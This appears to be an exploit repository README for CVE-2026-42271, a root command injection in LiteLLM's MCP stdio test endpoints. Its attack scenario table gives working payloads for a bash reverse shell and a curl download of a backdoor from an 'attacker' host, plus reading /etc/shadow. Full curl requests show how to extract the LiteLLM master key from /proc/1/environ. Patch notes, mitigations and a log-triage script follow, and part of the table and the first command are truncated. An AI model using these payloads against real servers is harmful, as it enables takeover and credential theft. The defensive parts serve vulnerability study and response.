## https://sploitus.com/exploit?id=47564AB3-627D-51FA-A9A8-571279747153
# CVE-2026-42271 — LiteLLM Authenticated Command Injection via MCP stdio Test Endpoints

> **LiteLLM** `POST /mcp-rest/test/connection` & `POST /mcp-rest/test/tools/list` — Authenticated command injection via MCP stdio transport. Any valid API key can execute arbitrary OS commands as **root** (in default Docker deployment).
>
> **Image pinned by digest**: the vulnerable container is pinned to LiteLLM **v1.82.6** to ensure long-term reproducibility.

| Field | Value |
|-------|-------|
| CVE | **CVE-2026-42271** |
| CVSS v4.0 | **8.7 (HIGH)** — `CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:N/SA:N` |
| CVSS v3.1 | **8.8 (HIGH)** — `AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` |
| CWE | CWE-77 / CWE-78 (OS Command Injection) |
| Affected | LiteLLM **>= 1.74.2,

```bash
 /tmp/pwned"]
  }'
```

### Verify Execution

```bash
# Check that the command executed inside the container
docker exec litellm-cve cat /tmp/pwned
# Output: uid=0(root) gid=0(root) groups=0(root),0(root),...
```

The API returns `"Failed to connect to MCP server"` because the spawned process doesn't speak the MCP protocol — but the **command has already been executed** with root privileges.

---

## Attack Scenarios

| Scenario | Payload |
|----------|---------|
| **Basic RCE** | `"args": ["-c", "id > /tmp/pwned"]` |
| **Read files** | `"args": ["-c", "cat /etc/shadow > /tmp/out"]` |
| **Exfiltrate env** | `"args": ["-c", "cat /proc/1/environ \| tr '\\0' '\\n' > /tmp/env"]` → contains `LITELLM_MASTER_KEY` |
| **Reverse shell** | `"args": ["-c", "bash -i >& /dev/tcp/attacker/4444 0>&1"]` |
| **Persistence** | `"args": ["-c", "curl http://attacker/malware -o /tmp/backdoor && chmod +x /tmp/backdoor"]` |

---

## Vulnerable Endpoints

### `POST /mcp-rest/test/connection`

Tests an MCP server connection. With stdio transport, spawns the provided command.

### `POST /mcp-rest/test/tools/list`

Lists tools from a test MCP server. Same behavior — spawns the provided command when using stdio transport.

### Request Body Format

```json
{
  "transport": "stdio",
  "command": "bash",
  "args": ["-c", ""],
  "env": {
    "PATH": "/usr/bin:/bin"
  }
}
```

| Field | Type | Required | Description |
|-------|------|----------|-------------|
| `transport` | string | Yes | Must be `"stdio"` for command injection |
| `command` | string | Yes | Executable to spawn (e.g., `bash`, `python`, `curl`) |
| `args` | array | Yes | Arguments passed to the command |
| `env` | object | No | Environment variables for the subprocess |

---

## Patch Analysis (v1.83.7)

The fix added two layers of defense:

1. **Command whitelist** via `validate_transport_fields()` — only allows: `npx`, `uvx`, `python`, `python3`, `node`, `docker`, `deno`
2. **Role-based access control** — both endpoints now require `PROXY_ADMIN` role

---

## Repository Structure

```
CVE-2026-42271/
├── README.md                  # This file
├── docker-compose.yml         # One-command vulnerable environment (pinned to v1.82.6)
├── requirements.txt           # Dependencies
├── exploit/
│   ├── exploit.py             # Full exploit script
│   └── payload.py             # Payload generation module
├── docs/
│   └── advisory.md            # Advisory reference
└── screenshots/               # Proof screenshots
```

---

## Mitigation

1. **Upgrade** to LiteLLM **v1.83.7+** (command whitelist + `PROXY_ADMIN` role check)
2. **Block** `/mcp-rest/test/connection` and `/mcp-rest/test/tools/list` at the reverse proxy
3. **Restrict** API key privileges — rotate keys if compromise is suspected
4. **Run as non-root** in Docker: `docker run --user 1000:1000 ...`
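
A log-triage sketch that ties the Patch Analysis allowlist to the mitigation steps above (an added example, not code from LiteLLM or from this repository): it flags logged stdio requests to the two test endpoints so you can decide whether keys need rotating. The JSON-lines schema (`method`, `path`, `role`, `key_alias`, `body`), the way the role is logged, and the sample records are constructed assumptions.

```python
import json
from urllib.parse import urlsplit

# From this page: the two test endpoints and the command allowlist added in v1.83.7.
TEST_ENDPOINTS = {"/mcp-rest/test/connection", "/mcp-rest/test/tools/list"}
PATCHED_ALLOWLIST = {"npx", "uvx", "python", "python3", "node", "docker", "deno"}

def classify(record):
    """Return (severity, reason) for one parsed log record, or None if not relevant."""
    path = urlsplit(str(record.get("path") or "")).path.rstrip("/")  # drop query, trailing slash
    if record.get("method") != "POST" or path not in TEST_ENDPOINTS:
        return None
    body = record.get("body")
    if not isinstance(body, dict) or body.get("transport") != "stdio":
        return None  # only the stdio transport spawns a local process
    command = body.get("command")
    if not isinstance(command, str) or command not in PATCHED_ALLOWLIST:
        return ("high", f"stdio command {command!r} is outside the v1.83.7 allowlist")
    if record.get("role") != "PROXY_ADMIN":
        return ("medium", f"allowlisted command {command!r} from a non-admin caller")
    return ("low", f"admin stdio test with allowlisted command {command!r}")

def triage(lines):  # JSON-lines in, (findings, unparsable_count) out
    findings, unparsable = [], 0
    for line in lines:
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            unparsable += 1  # keep count: gaps in the log matter during an investigation
            continue
        verdict = classify(record) if isinstance(record, dict) else None
        if verdict:
            findings.append((record.get("key_alias"), *verdict))
    return findings, unparsable

# Constructed sample records (assumed schema; the first payload is the one shown on this page).
SAMPLE = [json.dumps(r) for r in [
    {"method": "POST", "path": "/mcp-rest/test/connection", "role": "INTERNAL_USER", "key_alias": "ci-bot",
     "body": {"transport": "stdio", "command": "bash", "args": ["-c", "id > /tmp/pwned"]}},
    {"method": "POST", "path": "/mcp-rest/test/tools/list?debug=1", "role": "INTERNAL_USER", "key_alias": "dev-1",
     "body": {"transport": "stdio", "command": "npx", "args": ["-y", "example-mcp-server"]}},
    {"method": "POST", "path": "/mcp-rest/test/tools/list/", "role": "PROXY_ADMIN", "key_alias": "admin",
     "body": {"transport": "stdio", "command": "uvx", "args": ["example-mcp-server"]}},
    {"method": "POST", "path": "/mcp-rest/test/connection", "role": "PROXY_ADMIN", "key_alias": "admin",
     "body": {"transport": "http", "url": "https://mcp.example.internal/mcp"}},
]] + ["not-json"]  # last entry: a corrupt log line

if __name__ == "__main__":
    print(*triage(SAMPLE)[0], sep="\n")
```

Any `high` or `medium` finding on a version before v1.83.7 means a non-admin key reached a process-spawning endpoint, so treat that key and the proxy's secrets as exposed.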

---

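## ⚠️ Note: MCP SDK Environment Variable Isolation

When reproducing **section 5.7 (extracting process environment variables)**, note that **MCP Python SDK v1.25.0+** does **not inherit the environment variables of the LiteLLM parent process** when it creates a stdio subprocess. The SDK passes only `HOME` and `PATH` via `get_default_environment()`, then merges in the `env` field explicitly supplied by the user.

As a result, `env > /tmp/env_dump` **cannot capture `LITELLM_MASTER_KEY`**.

**Correct approach**: extract the environment variables by reading `/proc/1/environ` of the LiteLLM main process: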

```bash
# Extract environment variables (via /proc/1/environ)
curl -s -X POST \
  -H "Authorization: Bearer sk-litellm-master-key" \
  -H "Content-Type: application/json" \
  http://localhost:4000/mcp-rest/test/tools/list \
  -d '{
    "transport": "stdio",
    "command": "bash",
    "args": ["-c", "cat /proc/1/environ | tr \"\\0\" \"\\n\" > /tmp/env_dump"]
  }'

# View the result
docker exec litellm-cve cat /tmp/env_dump | grep -E "LITELLM|MASTER"
# Output: LITELLM_MASTER_KEY=sk-litellm-master-key
```

See section 5.7 of the [reproduction report](CVE-2026-42271_漏洞复现报告.docx) for details.

---

## References

- [GitHub Security Advisory GHSA-v4p8-mg3p-g94g](https://github.com/BerriAI/litellm/security/advisories/GHSA-v4p8-mg3p-g94g)
- [GitLab Advisory](https://advisories.gitlab.com/pypi/litellm/CVE-2026-42271/)
- [NVD Detail](https://nvd.nist.gov/vuln/detail/CVE-2026-42271)
- [v1.83.7-stable Release](https://github.com/BerriAI/litellm/releases/tag/v1.83.7-stable)
- [LiteLLM MCP Documentation](https://docs.litellm.ai/docs/mcp)

---

> **Disclaimer:** This content is provided for **educational purposes and authorized security testing only.**